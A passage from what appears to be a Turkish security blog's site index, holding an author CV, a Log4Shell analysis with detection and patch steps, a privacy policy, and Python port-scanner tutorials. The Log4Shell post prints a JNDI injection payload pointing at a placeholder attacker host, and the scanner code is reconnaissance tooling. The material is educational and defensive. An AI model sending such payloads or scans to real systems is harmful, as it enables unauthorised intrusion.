eWPTXv2 eLearnSecurity Web Application Penetration Tester eXtreme CRTO Certified Red Team Operator TSE — Sızma Testi Uzmanı Türk Standartları Enstitüsü — Sızma Testi Uzmanı 🔴 Yayımlanmış CVE'ler CVE-2026-40484 RCE — Kritik Uzaktan Kod Yürütme CVE-2026-40483 CVE CVE-2026-40485 CVE CVE-2026-40581 CVE CVE-2026-40593 CVE 🚩 CTF Yarışmaları 🇸🇦 BlackHat Saudi Arabia — Final 2025 Suudi Arabistan Finalist 🇹🇷 Konya HackMe CTF Konya, Türkiye Competitor 🎤 Konuşmalar \u0026 Etkinlikler 🇹🇷 Atlas Üniversitesi — İstanbul, Türkiye Siber 101 — Siber Güvenliğe Giriş 🇹🇷 İbtikar Assembly — Türkiye Siber 101 — Siber Güvenliğe Giriş 🇹🇷 İbtikar Assembly — Türkiye Uygulamalı Hack — Saldırgan Güvenlik Pratiği 🇹🇷 Gelişim Üniversitesi — Türkiye Siber 101 — Siber Güvenliğe Giriş 🇹🇷 ENG Pi — Mühendislik Öğrencileri, Türkiye Saldırgan Güvenliğe Nasıl ve Nereden Başlanır? — Soru \u0026 Cevap 🇾🇪 Dev Zone — Yemen Sosyal Mühendislik — Taktikler ve Farkındalık Sanad — Suriye Siber 101 + OSCP Nedir ve Nasıl Alınır 📚 Yayınlar \u0026 Kurslar 📖 Nmap için Kapsamlı Rehber 8 bölümlük teknik kitap — Nmap aracının kapsamlı anlatımı 🎓 OSCP Hazırlık Kursu — OSCP Prep Full 4 bölüm | 40+ saat video ve uygulamalı lab | ZeroStrike Academy academy.zerostrike.net ↗ 🌐 İletişim ayhanbasyildiz@gmail.com YouTube Instagram X (Twitter) LinkedIn GitHub ","permalink":"https://cyberah-blog.pages.dev/tr/about/","summary":"\u003cdiv class=\"cv-profile\"\u003e\n  \u003cdiv class=\"cv-profile-avatar\"\u003e⚡\u003c/div\u003e\n  \u003cdiv class=\"cv-profile-info\"\u003e\n    \u003cdiv class=\"cv-profile-name\"\u003eCyberah\u003c/div\u003e\n    \u003cdiv class=\"cv-profile-title\"\u003eAyham Othman — Sızma Testi Uzmanı | Güvenlik Araştırmacısı | Eğitmen\u003c/div\u003e\n    \u003cdiv class=\"cv-profile-tags\"\u003e\n      \u003cspan class=\"cv-tag red\"\u003e5+ CVE\u003c/span\u003e\n      \u003cspan class=\"cv-tag\"\u003eOSCP\u003c/span\u003e\n      \u003cspan class=\"cv-tag\"\u003eOSWE\u003c/span\u003e\n      \u003cspan class=\"cv-tag\"\u003e3+ Yıl Deneyim\u003c/span\u003e\n    \u003c/div\u003e\n  \u003c/div\u003e\n\u003c/div\u003e\n\u003chr\u003e\n\u003ch2 id=\"hakkımda\"\u003eHakkımda\u003c/h2\u003e\n\u003cp\u003eSiber güvenlik topluluğunda \u003cstrong\u003eCyberah\u003c/strong\u003e lakabıyla tanınan Ayham Othman, üç yılı aşkın deneyime sahip deneyimli bir sızma testi uzmanıdır. Yerel ve uluslararası şirketler için gelişmiş sızma testleri ve Red Team operasyonları yürütmektedir.\u003c/p\u003e\n\u003cp\u003eOSCP, OSWE ve eWPTXv2 gibi dünya genelinde tanınan sertifikaların yanı sıra Türk Standartları Enstitüsü siber güvenlik sertifikasına da sahiptir. Aralarında kritik Remote Code Execution açıklarının da bulunduğu 5\u0026rsquo;ten fazla yayımlanmış CVE ile güçlü bir güvenlik araştırma geçmişine sahiptir.\u003c/p\u003e","title":"Hakkımda"},{"content":" ⚠️ Uyarı: Bu makale yalnızca eğitim amaçlıdır.\nGenel Bakış Güvenlik Açığı Türü: JNDI Injection ile RCE Etki: Kritik (CVSS 10.0) Etkilenen Sistemler: Apache Log4j 2.0-beta9 to 2.14.1\nGüvenlik Açığı Nasıl Çalışır? Log4j, kullanıcı girdisini yorumlayarak harici kaynakları getirebiliyordu:\nUser-Agent: ${jndi:ldap://saldirgan.com/exploit} Tespit # Log dosyalarında istismar girişimlerini ara grep -E \u0026#39;\\$\\{jndi:(ldap|rmi|dns)://\u0026#39; /var/log/app/*.log Azaltma # Anlık çözüm java -Dlog4j2.formatMsgNoLookups=true -jar application.jar \u0026lt;!-- Kalıcı çözüm — Log4j güncelleme --\u0026gt; \u0026lt;dependency\u0026gt; \u0026lt;groupId\u0026gt;org.apache.logging.log4j\u0026lt;/groupId\u0026gt; \u0026lt;artifactId\u0026gt;log4j-core\u0026lt;/artifactId\u0026gt; \u0026lt;version\u0026gt;2.17.1\u0026lt;/version\u0026gt; \u0026lt;/dependency\u0026gt; Temel Çıkarımlar Günlük bağlamlarında harici girdiye asla güvenme Varlık envanteri tut Sanal Yama (WAF kuralları) hızlı yanıt için kritiktir ","permalink":"https://cyberah-blog.pages.dev/tr/cve/cve-2024-log4shell-analysis/","summary":"\u003cblockquote\u003e\n\u003cp\u003e⚠️ \u003cstrong\u003eUyarı\u003c/strong\u003e: Bu makale yalnızca eğitim amaçlıdır.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003ch2 id=\"genel-bakış\"\u003eGenel Bakış\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eGüvenlik Açığı Türü\u003c/strong\u003e: JNDI Injection ile RCE\n\u003cstrong\u003eEtki\u003c/strong\u003e: Kritik (CVSS 10.0)\n\u003cstrong\u003eEtkilenen Sistemler\u003c/strong\u003e: Apache Log4j 2.0-beta9 to 2.14.1\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"güvenlik-açığı-nasıl-çalışır\"\u003eGüvenlik Açığı Nasıl Çalışır?\u003c/h2\u003e\n\u003cp\u003eLog4j, kullanıcı girdisini yorumlayarak harici kaynakları getirebiliyordu:\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-fallback\" data-lang=\"fallback\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eUser-Agent: ${jndi:ldap://saldirgan.com/exploit}\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"tespit\"\u003eTespit\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Log dosyalarında istismar girişimlerini ara\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003egrep -E \u003cspan class=\"s1\"\u003e\u0026#39;\\$\\{jndi:(ldap|rmi|dns)://\u0026#39;\u003c/span\u003e /var/log/app/*.log\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"azaltma\"\u003eAzaltma\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Anlık çözüm\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ejava -Dlog4j2.formatMsgNoLookups\u003cspan class=\"o\"\u003e=\u003c/span\u003e\u003cspan class=\"nb\"\u003etrue\u003c/span\u003e -jar application.jar\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-xml\" data-lang=\"xml\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c\"\u003e\u0026lt;!-- Kalıcı çözüm — Log4j güncelleme --\u0026gt;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"nt\"\u003e\u0026lt;dependency\u0026gt;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"nt\"\u003e\u0026lt;groupId\u0026gt;\u003c/span\u003eorg.apache.logging.log4j\u003cspan class=\"nt\"\u003e\u0026lt;/groupId\u0026gt;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"nt\"\u003e\u0026lt;artifactId\u0026gt;\u003c/span\u003elog4j-core\u003cspan class=\"nt\"\u003e\u0026lt;/artifactId\u0026gt;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"nt\"\u003e\u0026lt;version\u0026gt;\u003c/span\u003e2.17.1\u003cspan class=\"nt\"\u003e\u0026lt;/version\u0026gt;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"nt\"\u003e\u0026lt;/dependency\u0026gt;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"temel-çıkarımlar\"\u003eTemel Çıkarımlar\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eGünlük bağlamlarında harici girdiye \u003cstrong\u003easla güvenme\u003c/strong\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eVarlık envanteri\u003c/strong\u003e tut\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSanal Yama\u003c/strong\u003e (WAF kuralları) hızlı yanıt için kritiktir\u003c/li\u003e\n\u003c/ol\u003e","title":"CVE Analizi — Log4Shell Modeli: JNDI Injection Derinlemesine İnceleme"},{"content":"Gizlilik Politikası Son güncelleme: 19 Nisan 2026\nVeri Toplama Kişisel tanımlayıcı bilgi toplamıyoruz. Anonim trafik analizi için Google Analytics kullanıyoruz.\nÇerezler Okuma deneyiminizi iyileştirmek ve tercihlerinizi saklamak için çerezler kullanabiliriz.\nReklamcılık Reklam göstermek için Google AdSense kullanıyoruz. Google, kişiselleştirilmiş reklamlar için çerezler kullanabilir.\nYorumlar Yorum sistemi GitHub ile entegre Giscus kullanmaktadır.\nİletişim Sorularınız için: support@zerostrike.net\n","permalink":"https://cyberah-blog.pages.dev/tr/privacy/","summary":"\u003ch2 id=\"gizlilik-politikası\"\u003eGizlilik Politikası\u003c/h2\u003e\n\u003cp\u003eSon güncelleme: 19 Nisan 2026\u003c/p\u003e\n\u003ch3 id=\"veri-toplama\"\u003eVeri Toplama\u003c/h3\u003e\n\u003cp\u003eKişisel tanımlayıcı bilgi toplamıyoruz. Anonim trafik analizi için Google Analytics kullanıyoruz.\u003c/p\u003e\n\u003ch3 id=\"çerezler\"\u003eÇerezler\u003c/h3\u003e\n\u003cp\u003eOkuma deneyiminizi iyileştirmek ve tercihlerinizi saklamak için çerezler kullanabiliriz.\u003c/p\u003e\n\u003ch3 id=\"reklamcılık\"\u003eReklamcılık\u003c/h3\u003e\n\u003cp\u003eReklam göstermek için Google AdSense kullanıyoruz. Google, kişiselleştirilmiş reklamlar için çerezler kullanabilir.\u003c/p\u003e\n\u003ch3 id=\"yorumlar\"\u003eYorumlar\u003c/h3\u003e\n\u003cp\u003eYorum sistemi GitHub ile entegre Giscus kullanmaktadır.\u003c/p\u003e\n\u003ch3 id=\"iletişim\"\u003eİletişim\u003c/h3\u003e\n\u003cp\u003eSorularınız için: \u003ca href=\"mailto:support@zerostrike.net\"\u003esupport@zerostrike.net\u003c/a\u003e\u003c/p\u003e","title":"Gizlilik Politikası"},{"content":"Neden Siber Güvenlik için Python? Python, zengin kütüphaneleri (socket, requests, scapy), hızlı geliştirme süreci ve büyük topluluğu sayesinde güvenlik profesyonellerinin #1 dilidir.\nTemel Ağ Programlama import socket def check_port(host, port, timeout=1): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(timeout) result = sock.connect_ex((host, port)) sock.close() return result == 0 except socket.error: return False target = \u0026#34;192.168.1.1\u0026#34; for port in range(1, 1025): if check_port(target, port): print(f\u0026#34;[+] Port {port} AÇIK\u0026#34;) Çoklu İş Parçacıklı Port Tarayıcı import socket import concurrent.futures def scan_port(args): host, port = args try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(0.5) if sock.connect_ex((host, port)) == 0: sock.close() return port except Exception: pass return None def fast_scan(host): with concurrent.futures.ThreadPoolExecutor(max_workers=100) as executor: for result in executor.map(scan_port, [(host, p) for p in range(1, 1025)]): if result: print(f\u0026#34;[+] {result}/tcp AÇIK\u0026#34;) fast_scan(\u0026#34;192.168.1.1\u0026#34;) Önerilen Projeler Port Tarayıcı Alt Alan Adı Sayım Aracı Web Dizin Brute-forcer Scapy ile Paket Dinleyici ","permalink":"https://cyberah-blog.pages.dev/tr/programming/python-for-hackers/","summary":"\u003ch2 id=\"neden-siber-güvenlik-için-python\"\u003eNeden Siber Güvenlik için Python?\u003c/h2\u003e\n\u003cp\u003ePython, zengin kütüphaneleri (\u003ccode\u003esocket\u003c/code\u003e, \u003ccode\u003erequests\u003c/code\u003e, \u003ccode\u003escapy\u003c/code\u003e), hızlı geliştirme süreci ve büyük topluluğu sayesinde güvenlik profesyonellerinin #1 dilidir.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"temel-ağ-programlama\"\u003eTemel Ağ Programlama\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-python\" data-lang=\"python\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"kn\"\u003eimport\u003c/span\u003e \u003cspan class=\"nn\"\u003esocket\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"k\"\u003edef\u003c/span\u003e \u003cspan class=\"nf\"\u003echeck_port\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003ehost\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003eport\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003etimeout\u003c/span\u003e\u003cspan class=\"o\"\u003e=\u003c/span\u003e\u003cspan class=\"mi\"\u003e1\u003c/span\u003e\u003cspan class=\"p\"\u003e):\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"k\"\u003etry\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"n\"\u003esock\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e \u003cspan class=\"n\"\u003esocket\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003esocket\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003esocket\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eAF_INET\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003esocket\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eSOCK_STREAM\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"n\"\u003esock\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003esettimeout\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003etimeout\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"n\"\u003eresult\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e \u003cspan class=\"n\"\u003esock\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003econnect_ex\u003c/span\u003e\u003cspan class=\"p\"\u003e((\u003c/span\u003e\u003cspan class=\"n\"\u003ehost\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003eport\u003c/span\u003e\u003cspan class=\"p\"\u003e))\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"n\"\u003esock\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eclose\u003c/span\u003e\u003cspan class=\"p\"\u003e()\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"k\"\u003ereturn\u003c/span\u003e \u003cspan class=\"n\"\u003eresult\u003c/span\u003e \u003cspan class=\"o\"\u003e==\u003c/span\u003e \u003cspan class=\"mi\"\u003e0\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"k\"\u003eexcept\u003c/span\u003e \u003cspan class=\"n\"\u003esocket\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eerror\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"k\"\u003ereturn\u003c/span\u003e \u003cspan class=\"kc\"\u003eFalse\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"n\"\u003etarget\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e \u003cspan class=\"s2\"\u003e\u0026#34;192.168.1.1\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"k\"\u003efor\u003c/span\u003e \u003cspan class=\"n\"\u003eport\u003c/span\u003e \u003cspan class=\"ow\"\u003ein\u003c/span\u003e \u003cspan class=\"nb\"\u003erange\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"mi\"\u003e1\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"mi\"\u003e1025\u003c/span\u003e\u003cspan class=\"p\"\u003e):\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"k\"\u003eif\u003c/span\u003e \u003cspan class=\"n\"\u003echeck_port\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003etarget\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003eport\u003c/span\u003e\u003cspan class=\"p\"\u003e):\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"nb\"\u003eprint\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"sa\"\u003ef\u003c/span\u003e\u003cspan class=\"s2\"\u003e\u0026#34;[+] Port \u003c/span\u003e\u003cspan class=\"si\"\u003e{\u003c/span\u003e\u003cspan class=\"n\"\u003eport\u003c/span\u003e\u003cspan class=\"si\"\u003e}\u003c/span\u003e\u003cspan class=\"s2\"\u003e AÇIK\u0026#34;\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"çoklu-iş-parçacıklı-port-tarayıcı\"\u003eÇoklu İş Parçacıklı Port Tarayıcı\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-python\" data-lang=\"python\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"kn\"\u003eimport\u003c/span\u003e \u003cspan class=\"nn\"\u003esocket\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"kn\"\u003eimport\u003c/span\u003e \u003cspan class=\"nn\"\u003econcurrent.futures\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"k\"\u003edef\u003c/span\u003e \u003cspan class=\"nf\"\u003escan_port\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003eargs\u003c/span\u003e\u003cspan class=\"p\"\u003e):\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"n\"\u003ehost\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003eport\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e \u003cspan class=\"n\"\u003eargs\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"k\"\u003etry\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"n\"\u003esock\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e \u003cspan class=\"n\"\u003esocket\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003esocket\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003esocket\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eAF_INET\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003esocket\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eSOCK_STREAM\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"n\"\u003esock\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003esettimeout\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"mf\"\u003e0.5\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"k\"\u003eif\u003c/span\u003e \u003cspan class=\"n\"\u003esock\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003econnect_ex\u003c/span\u003e\u003cspan class=\"p\"\u003e((\u003c/span\u003e\u003cspan class=\"n\"\u003ehost\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003eport\u003c/span\u003e\u003cspan class=\"p\"\u003e))\u003c/span\u003e \u003cspan class=\"o\"\u003e==\u003c/span\u003e \u003cspan class=\"mi\"\u003e0\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e            \u003cspan class=\"n\"\u003esock\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eclose\u003c/span\u003e\u003cspan class=\"p\"\u003e()\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e            \u003cspan class=\"k\"\u003ereturn\u003c/span\u003e \u003cspan class=\"n\"\u003eport\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"k\"\u003eexcept\u003c/span\u003e \u003cspan class=\"ne\"\u003eException\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"k\"\u003epass\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"k\"\u003ereturn\u003c/span\u003e \u003cspan class=\"kc\"\u003eNone\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"k\"\u003edef\u003c/span\u003e \u003cspan class=\"nf\"\u003efast_scan\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003ehost\u003c/span\u003e\u003cspan class=\"p\"\u003e):\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"k\"\u003ewith\u003c/span\u003e \u003cspan class=\"n\"\u003econcurrent\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003efutures\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eThreadPoolExecutor\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003emax_workers\u003c/span\u003e\u003cspan class=\"o\"\u003e=\u003c/span\u003e\u003cspan class=\"mi\"\u003e100\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e \u003cspan class=\"k\"\u003eas\u003c/span\u003e \u003cspan class=\"n\"\u003eexecutor\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e        \u003cspan class=\"k\"\u003efor\u003c/span\u003e \u003cspan class=\"n\"\u003eresult\u003c/span\u003e \u003cspan class=\"ow\"\u003ein\u003c/span\u003e \u003cspan class=\"n\"\u003eexecutor\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003emap\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003escan_port\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"p\"\u003e[(\u003c/span\u003e\u003cspan class=\"n\"\u003ehost\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003ep\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e \u003cspan class=\"k\"\u003efor\u003c/span\u003e \u003cspan class=\"n\"\u003ep\u003c/span\u003e \u003cspan class=\"ow\"\u003ein\u003c/span\u003e \u003cspan class=\"nb\"\u003erange\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"mi\"\u003e1\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"mi\"\u003e1025\u003c/span\u003e\u003cspan class=\"p\"\u003e)]):\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e            \u003cspan class=\"k\"\u003eif\u003c/span\u003e \u003cspan class=\"n\"\u003eresult\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e                \u003cspan class=\"nb\"\u003eprint\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"sa\"\u003ef\u003c/span\u003e\u003cspan 